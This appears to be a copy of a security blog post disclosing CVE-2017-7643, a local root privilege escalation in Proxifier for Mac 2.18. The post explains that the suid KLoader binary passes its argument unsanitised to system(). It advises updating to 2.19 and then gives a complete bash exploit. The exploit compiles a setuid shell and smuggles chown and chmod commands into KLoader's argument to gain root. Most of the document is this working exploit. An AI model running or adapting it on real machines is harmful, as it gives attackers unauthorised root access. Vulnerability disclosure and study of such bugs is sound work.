52 lines
No EOL
1.8 KiB
Text
52 lines
No EOL
1.8 KiB
Text
# Source: https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html
|
|
|
|
Proxifier 2.18 (also 2.17 and possibly some earlier version) ships with a
|
|
KLoader binary which it installs suid root the first time Proxifier is run. This
|
|
binary serves a single purpose which is to load and unload Proxifier's kernel
|
|
extension.
|
|
|
|
Unfortunately it does this by taking the first parameter passed to it on the
|
|
commandline without any sanitisation and feeding it straight into system().
|
|
|
|
This means not only can you load any arbitrary kext as a non-root user but you
|
|
can also get a local root shell.
|
|
|
|
Although this is a bit of a terrible bug that shouldn't be happening in 2017,
|
|
Proxifier's developers fixed the issue in record time so that's something!
|
|
|
|
Everyone using Proxifier for Mac should update to 2.19 as soon as possible.
|
|
|
|
https://m4.rkw.io/proxifier_privesc.sh.txt
|
|
6040180f672a2b70511a483e4996d784f03e04c624a8c4e01e71f50709ab77c3
|
|
-------------------------------------------------------------------
|
|
|
|
#!/bin/bash
|
|
|
|
#####################################################################
|
|
# Local root exploit for vulnerable KLoader binary distributed with #
|
|
# Proxifier for Mac v2.18 #
|
|
#####################################################################
|
|
# by m4rkw #
|
|
#####################################################################
|
|
|
|
cat > a.c <<EOF
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
|
|
int main()
|
|
{
|
|
setuid(0);
|
|
seteuid(0);
|
|
|
|
execl("/bin/bash", "bash", NULL);
|
|
return 0;
|
|
}
|
|
EOF
|
|
|
|
gcc -o /tmp/a a.c
|
|
rm -f a.c
|
|
/Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel /tmp/a ; chmod 4755 /tmp/a'
|
|
/tmp/a
|
|
|
|
|
|
------------------------------------------------------------------- |